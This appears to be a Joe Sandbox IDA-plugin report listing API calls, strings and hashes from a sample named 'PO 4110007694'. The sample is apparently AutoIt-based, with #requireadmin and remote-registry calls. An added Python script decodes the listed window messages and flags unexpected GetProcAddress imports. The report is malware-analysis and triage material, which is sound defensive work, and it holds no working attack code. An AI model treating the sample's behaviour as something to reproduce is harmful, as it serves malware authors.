                                                                    • API String ID: 910771015-0
                                                                    • Opcode ID: 0af96e42d9e2c5da7c09e0a6fd7698f95dbdc21b805ec063c0e70f25ed5fc290
                                                                    • Instruction ID: b2d599ba09da0174755bdc8610f80d94aee2eaf5c661fe0b50d373d475dedfa0
                                                                    • Opcode Fuzzy Hash: 0af96e42d9e2c5da7c09e0a6fd7698f95dbdc21b805ec063c0e70f25ed5fc290
                                                                    • Instruction Fuzzy Hash: E631C131600108AFEF10AF64CC89BBE77ACEF46728F044069FD15E7291DB70AD459BA5
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: __wcsnicmp
                                                                    • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                    • API String ID: 1038674560-2734436370
                                                                    • Opcode ID: d94950b1e357ff6a7d785a597ae6e626c6387ed876d7dfebc43f52a99fead7f7
                                                                    • Instruction ID: 172847455c4f1d30ffe559b922a14bc6a092e481b05a63264df45f40774b117d
                                                                    • Opcode Fuzzy Hash: d94950b1e357ff6a7d785a597ae6e626c6387ed876d7dfebc43f52a99fead7f7
                                                                    • Instruction Fuzzy Hash: A52146B225412166D230BA34FC83FA773A8EF56344F10403DF8A686091EB519E83E2A5
                                                                    APIs
                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C6DC09
                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C6DC2F
                                                                    • SysAllocString.OLEAUT32(00000000), ref: 00C6DC32
                                                                    • SysAllocString.OLEAUT32 ref: 00C6DC53
                                                                    • SysFreeString.OLEAUT32 ref: 00C6DC5C
                                                                    • StringFromGUID2.OLE32(?,?,00000028), ref: 00C6DC76
                                                                    • SysAllocString.OLEAUT32(?), ref: 00C6DC84
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                    • String ID:
                                                                    • API String ID: 3761583154-0
                                                                    • Opcode ID: dd25e93ea05fa3991c380abf8126e035b65167079943efa3cb73564049be1b69
                                                                    • Instruction ID: 804afc0b7ccdf04df50efaa897a1b8425b75fc66320e07b16de68ff30dd1ca93
                                                                    • Opcode Fuzzy Hash: dd25e93ea05fa3991c380abf8126e035b65167079943efa3cb73564049be1b69
                                                                    • Instruction Fuzzy Hash: 5C213235704209BFDB209FA8DCC8EAB77ECEB09360B108126F915CB261D670DD81CB64
                                                                    APIs
                                                                      • Part of subcall function 00C11D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00C11D73
                                                                      • Part of subcall function 00C11D35: GetStockObject.GDI32(00000011), ref: 00C11D87
                                                                      • Part of subcall function 00C11D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00C11D91
                                                                    • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00C97632
                                                                    • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00C9763F
                                                                    • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00C9764A
                                                                    • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00C97659
                                                                    • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00C97665
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$CreateObjectStockWindow
                                                                    • String ID: Msctls_Progress32
                                                                    • API String ID: 1025951953-3636473452
                                                                    • Opcode ID: dc6b2b39dc66280a3ed0fa4d5883ab9bb1e598f744074301e50852d613fe9df3
                                                                    • Instruction ID: a2d45d209e2ce3bd550f3e4f4615a28902c557cd80310e7e33732b91f5cfef11
                                                                    • Opcode Fuzzy Hash: dc6b2b39dc66280a3ed0fa4d5883ab9bb1e598f744074301e50852d613fe9df3
                                                                    • Instruction Fuzzy Hash: 5C11B6B1110219BFEF119F64CC85EEB7F6DEF08798F114115BA04A2050C6729C21DBA4
                                                                    APIs
                                                                    • __init_pointers.LIBCMT ref: 00C39AE6
                                                                      • Part of subcall function 00C33187: EncodePointer.KERNEL32(00000000), ref: 00C3318A
                                                                      • Part of subcall function 00C33187: __initp_misc_winsig.LIBCMT ref: 00C331A5
                                                                      • Part of subcall function 00C33187: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00C39EA0
                                                                      • Part of subcall function 00C33187: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00C39EB4
                                                                      • Part of subcall function 00C33187: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00C39EC7
                                                                      • Part of subcall function 00C33187: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00C39EDA
                                                                      • Part of subcall function 00C33187: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00C39EED
                                                                      • Part of subcall function 00C33187: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00C39F00
                                                                      • Part of subcall function 00C33187: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00C39F13
                                                                      • Part of subcall function 00C33187: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00C39F26
                                                                      • Part of subcall function 00C33187: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00C39F39
                                                                      • Part of subcall function 00C33187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00C39F4C
                                                                      • Part of subcall function 00C33187: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00C39F5F
                                                                      • Part of subcall function 00C33187: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00C39F72
                                                                      • Part of subcall function 00C33187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00C39F85
                                                                      • Part of subcall function 00C33187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00C39F98
                                                                      • Part of subcall function 00C33187: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00C39FAB
                                                                      • Part of subcall function 00C33187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00C39FBE
                                                                    • __mtinitlocks.LIBCMT ref: 00C39AEB
                                                                    • __mtterm.LIBCMT ref: 00C39AF4
                                                                      • Part of subcall function 00C39B5C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00C39AF9,00C37CD0,00CCA0B8,00000014), ref: 00C39C56
                                                                      • Part of subcall function 00C39B5C: _free.LIBCMT ref: 00C39C5D
                                                                      • Part of subcall function 00C39B5C: DeleteCriticalSection.KERNEL32(00CCEC00,?,?,00C39AF9,00C37CD0,00CCA0B8,00000014), ref: 00C39C7F
                                                                    • __calloc_crt.LIBCMT ref: 00C39B19
                                                                    • __initptd.LIBCMT ref: 00C39B3B
                                                                    • GetCurrentThreadId.KERNEL32 ref: 00C39B42
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                                    • String ID:
                                                                    • API String ID: 3567560977-0
                                                                    • Opcode ID: 419ce02f8eda7c3b5ed27c55ac6dd523f17a96a48cd93009d6d091605c9d6385
                                                                    • Instruction ID: 21335bf51572bd45c5bd0b4136331fc639afa94b1a9aae279165b38df670159a
                                                                    • Opcode Fuzzy Hash: 419ce02f8eda7c3b5ed27c55ac6dd523f17a96a48cd93009d6d091605c9d6385
                                                                    • Instruction Fuzzy Hash: 2BF09A32A397116AE6347B74BC07B8E7690DF02738F200A2AF461C60D2EFF0894161A0
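The records above list raw Win32 calls with hexadecimal operands, and it is the operands that say what a function does. Read against winuser.h and commctrl.h, the SendMessageW run at 00C97632..00C97665, issued to a window created with class Msctls_Progress32, is CCM_SETBKCOLOR and PBM_SETBARCOLOR with CLR_DEFAULT, PBM_SETPOS 0, PBM_SETRANGE 0..100 and PBM_SETSTEP 1, i.e. a progress-bar setup helper. The GetProcAddress chain under __init_pointers resolves the Fls* and thread-pool exports that the MSVC CRT looks up in kernel32 by name at startup, which is runtime housekeeping rather than the kind of import hiding worth chasing. The Python script below is an example added to this report, not code from Joe Sandbox or from the sample: it parses lines in the IDA plugin's APIs format, names the messages, decodes their operands, and lists GetProcAddress targets that the CRT startup set does not explain. The message table and CLR_DEFAULT value come from the Windows SDK headers; the CRT export set is taken from the __init_pointers record above; the last sample line (ref 00000000) is constructed to exercise the flagging path and does not describe this sample. It also goes beyond the two records it follows by handling PostMessageW (WM_COMMAND, as in the GetMenu record) and the tab-control message 0x130C (TCM_SETCURSEL, as in the ShowWindow record).

```python
"""Decode Joe Sandbox IDA-plugin "APIs" lines: which window messages a function sends and
which exports it resolves by name. Added example; not part of the report or of Joe Sandbox."""
import re
from typing import List, NamedTuple, Optional, Tuple

# Constructed sample in the shape of the "APIs" lists in this report. All lines but the last
# are copied from the listing; the last one (ref 00000000) is made up here to exercise the
# flagging path and says nothing about the analysed binary.
SAMPLE = """\
• Part of subcall function 00C11D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00C11D73
• Part of subcall function 00C11D35: GetStockObject.GDI32(00000011), ref: 00C11D87
• Part of subcall function 00C11D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00C11D91
• SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00C97632
• SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00C9763F
• SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00C9764A
• SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00C97659
• SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00C97665
• PostMessageW.USER32(?,00000111,?,00000000), ref: 00C95928
• SendMessageW.USER32(?,0000130C,?,00000000), ref: 00C9B7EF
• __init_pointers.LIBCMT ref: 00C39AE6
• Part of subcall function 00C33187: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00C39EA0
• Part of subcall function 00C33187: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00C39EB4
• Part of subcall function 00C33187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00C39F4C
• GetCurrentThreadId.KERNEL32 ref: 00C39B42
• GetProcAddress.KERNEL32(00000000,VirtualProtectEx), ref: 00000000
"""

# One plugin line: optional "Part of subcall function X:", Api.MODULE, optional (args), ref.
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<api>[A-Za-z_][A-Za-z_0-9]*)\.(?P<mod>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$"
)

# Message IDs from winuser.h / commctrl.h (WM_USER = 0x400, CCM_FIRST = 0x2000, TCM_FIRST = 0x1300).
MSG_NAMES = {
    0x0030: "WM_SETFONT", 0x0111: "WM_COMMAND",
    0x0401: "PBM_SETRANGE", 0x0402: "PBM_SETPOS", 0x0404: "PBM_SETSTEP",
    0x0409: "PBM_SETBARCOLOR", 0x2001: "CCM_SETBKCOLOR", 0x130C: "TCM_SETCURSEL",
}
CLR_DEFAULT = 0xFF000000  # commctrl.h: use the control's default colour

# Exports the __init_pointers record in this report shows the CRT resolving from kernel32 at
# startup. Resolving these by name is ordinary MSVC CRT behaviour, not an evasion technique.
CRT_STARTUP_IMPORTS = frozenset({
    "FlsAlloc", "FlsFree", "FlsGetValue", "FlsSetValue", "InitializeCriticalSectionEx",
    "CreateEventExW", "CreateSemaphoreExW", "SetThreadStackGuarantee",
    "CreateThreadpoolTimer", "SetThreadpoolTimer", "WaitForThreadpoolTimerCallbacks",
    "CloseThreadpoolTimer", "CreateThreadpoolWait", "SetThreadpoolWait", "CloseThreadpoolWait",
})


class Call(NamedTuple):
    api: str
    module: str
    args: Tuple[str, ...]
    ref: str
    subcall: Optional[str]  # callee address when the line is "Part of subcall function"


def parse_api_lines(text: str) -> List[Call]:
    """Parse every recognisable plugin line; headings and other fields are skipped."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        args = tuple(a.strip() for a in m["args"].split(",")) if m["args"] else ()
        calls.append(Call(m["api"], m["mod"], args, m["ref"], m["sub"]))
    return calls


def as_int(arg: str) -> Optional[int]:
    """Hex operand as the plugin prints it; '?' means the value was not recovered."""
    return int(arg, 16) if re.fullmatch(r"-?[0-9A-Fa-f]+", arg) else None


def describe_message(call: Call) -> str:
    """Name the message in a SendMessageW/PostMessageW call and decode wParam/lParam
    where the message fixes their meaning."""
    operands = [as_int(a) for a in call.args[1:4]] + [None] * 3
    msg, wparam, lparam = operands[:3]
    if msg is None:
        return "msg=?"
    name = MSG_NAMES.get(msg, f"msg=0x{msg:04X}")
    if name == "PBM_SETRANGE" and lparam is not None:
        # lParam = MAKELPARAM(nMinRange, nMaxRange): low word minimum, high word maximum
        return f"{name} min={lparam & 0xFFFF} max={lparam >> 16}"
    if name in ("PBM_SETBARCOLOR", "CCM_SETBKCOLOR") and lparam is not None:
        colour = "CLR_DEFAULT" if lparam == CLR_DEFAULT else f"0x{lparam:08X}"
        return f"{name} color={colour}"
    if name in ("PBM_SETPOS", "PBM_SETSTEP") and wparam is not None:
        return f"{name} value={wparam}"
    return name


def unexpected_getprocaddress(calls: List[Call]) -> List[str]:
    """Names resolved through GetProcAddress that the CRT startup set does not account for."""
    return [c.args[1] for c in calls
            if c.api == "GetProcAddress" and len(c.args) > 1
            and c.args[1] not in CRT_STARTUP_IMPORTS]


def summarize(text: str) -> dict:
    calls = parse_api_lines(text)
    return {
        "messages": [describe_message(c) for c in calls
                     if c.api in ("SendMessageW", "PostMessageW")],
        "unexpected_getprocaddress": unexpected_getprocaddress(calls),
    }


if __name__ == "__main__":
    for key, value in summarize(SAMPLE).items():
        print(key, value)
```

Run it as a script to print the summary for the embedded sample, or pass a copied APIs list to summarize(). Lines the regex does not recognise (the Strings, Memory Dump Source and Similarity fields) are ignored, so a whole record can be pasted in unchanged.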
                                                                    APIs
                                                                    • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00C33F85), ref: 00C34085
                                                                    • GetProcAddress.KERNEL32(00000000), ref: 00C3408C
                                                                    • EncodePointer.KERNEL32(00000000), ref: 00C34097
                                                                    • DecodePointer.KERNEL32(00C33F85), ref: 00C340B2
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                    • String ID: RoUninitialize$combase.dll
                                                                    • API String ID: 3489934621-2819208100
                                                                    • Opcode ID: 0f38b653ee5a7f62b327d4aef37953c0a614c461c34f259968bedb1fa41bec15
                                                                    • Instruction ID: abce74a021f83dab232709fe7401bd8d369e0d4d24b2c653e0392e175223588b
                                                                    • Opcode Fuzzy Hash: 0f38b653ee5a7f62b327d4aef37953c0a614c461c34f259968bedb1fa41bec15
                                                                    • Instruction Fuzzy Hash: D0E09970A92252ABEA24AF65EC0DB0D3BA4BB04B46F10403AF111F10F0CBBA9601CA16
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: _memmove$__itow__swprintf
                                                                    • String ID:
                                                                    • API String ID: 3253778849-0
                                                                    • Opcode ID: 9697d463feee39a83281399fe948489c232e0afe1169eebfa34589704d5d2305
                                                                    • Instruction ID: 04604ab667922bc0fffed6c63a3065e1bc0978a9118b36a620eb1ddc58e15797
                                                                    • Opcode Fuzzy Hash: 9697d463feee39a83281399fe948489c232e0afe1169eebfa34589704d5d2305
                                                                    • Instruction Fuzzy Hash: B5618C3190065A9BDF01EF60CC91EFE3BA9EF05308F448519F8596B192DB35E945FB50
                                                                    APIs
                                                                      • Part of subcall function 00C17DE1: _memmove.LIBCMT ref: 00C17E22
                                                                      • Part of subcall function 00C90E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C8FDAD,?,?), ref: 00C90E31
                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C902BD
                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00C902FD
                                                                    • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00C90320
                                                                    • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00C90349
                                                                    • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00C9038C
                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00C90399
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                                    • String ID:
                                                                    • API String ID: 4046560759-0
                                                                    • Opcode ID: def49c60f71afa052cea45e273fcb791d24ea0fe868ae69262010647fe91bb8b
                                                                    • Instruction ID: cb1689b1c1d403392f0deff67b21974f97448a37ecc781a1a47879fd206b49cf
                                                                    • Opcode Fuzzy Hash: def49c60f71afa052cea45e273fcb791d24ea0fe868ae69262010647fe91bb8b
                                                                    • Instruction Fuzzy Hash: 07514D31208204DFCB14EF64C889EAEBBE9FF85314F14491DF455872A2DB31EA45EB52
                                                                    APIs
                                                                    • GetMenu.USER32(?), ref: 00C957FB
                                                                    • GetMenuItemCount.USER32(00000000), ref: 00C95832
                                                                    • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00C9585A
                                                                    • GetMenuItemID.USER32(?,?), ref: 00C958C9
                                                                    • GetSubMenu.USER32(?,?), ref: 00C958D7
                                                                    • PostMessageW.USER32(?,00000111,?,00000000), ref: 00C95928
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Menu$Item$CountMessagePostString
                                                                    • String ID:
                                                                    • API String ID: 650687236-0
                                                                    • Opcode ID: 20b8cca4d40050ec136a42cbf7a1082ca6196e0fce6da4cebbf464cba7ee9127
                                                                    • Instruction ID: b2606bb537dd488996a4b70ae88a04d0c45e652d691af1d147370759e2ddb51e
                                                                    • Opcode Fuzzy Hash: 20b8cca4d40050ec136a42cbf7a1082ca6196e0fce6da4cebbf464cba7ee9127
                                                                    • Instruction Fuzzy Hash: 46518031E00615EFDF11EF64C859AAEBBB4EF48310F104069E812BB391CB70AE42DB94
                                                                    APIs
                                                                    • VariantInit.OLEAUT32(?), ref: 00C6EF06
                                                                    • VariantClear.OLEAUT32(00000013), ref: 00C6EF78
                                                                    • VariantClear.OLEAUT32(00000000), ref: 00C6EFD3
                                                                    • _memmove.LIBCMT ref: 00C6EFFD
                                                                    • VariantClear.OLEAUT32(?), ref: 00C6F04A
                                                                    • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00C6F078
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Variant$Clear$ChangeInitType_memmove
                                                                    • String ID:
                                                                    • API String ID: 1101466143-0
                                                                    • Opcode ID: c5ca9b3a85444bfad6d5e4c6063ac9624a33b0a147a6ccb47e3afed7c18a7fe4
                                                                    • Instruction ID: 2a25cd8c6a8cf9a090aea358ec38e07fc6c0d35fd63a59400c1988ce8ded6bb6
                                                                    • Opcode Fuzzy Hash: c5ca9b3a85444bfad6d5e4c6063ac9624a33b0a147a6ccb47e3afed7c18a7fe4
                                                                    • Instruction Fuzzy Hash: 9B516D75A00209DFCB24CF58D884AAAB7B8FF4C314B15856EE959DB301E734E911CF90
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 00C72258
                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C722A3
                                                                    • IsMenu.USER32(00000000), ref: 00C722C3
                                                                    • CreatePopupMenu.USER32 ref: 00C722F7
                                                                    • GetMenuItemCount.USER32(000000FF), ref: 00C72355
                                                                    • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00C72386
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                    • String ID:
                                                                    • API String ID: 3311875123-0
                                                                    • Opcode ID: 531fffce25f8e70fe6c9637330b248ba01726a7ffcea0987a54ef1008293d227
                                                                    • Instruction ID: 4501b14afd8da46a016439b61f914d29a9f2916e1e58b8dc4eda28a2ac23d169
                                                                    • Opcode Fuzzy Hash: 531fffce25f8e70fe6c9637330b248ba01726a7ffcea0987a54ef1008293d227
                                                                    • Instruction Fuzzy Hash: 3C51A170600249DFDF25CF68D888BADBBF9FF45318F10C22AE869972A1D3749A45CB51
                                                                    APIs
                                                                      • Part of subcall function 00C12612: GetWindowLongW.USER32(?,000000EB), ref: 00C12623
                                                                    • BeginPaint.USER32(?,?,?,?,?,?), ref: 00C1179A
                                                                    • GetWindowRect.USER32(?,?), ref: 00C117FE
                                                                    • ScreenToClient.USER32(?,?), ref: 00C1181B
                                                                    • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00C1182C
                                                                    • EndPaint.USER32(?,?), ref: 00C11876
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                                    • String ID:
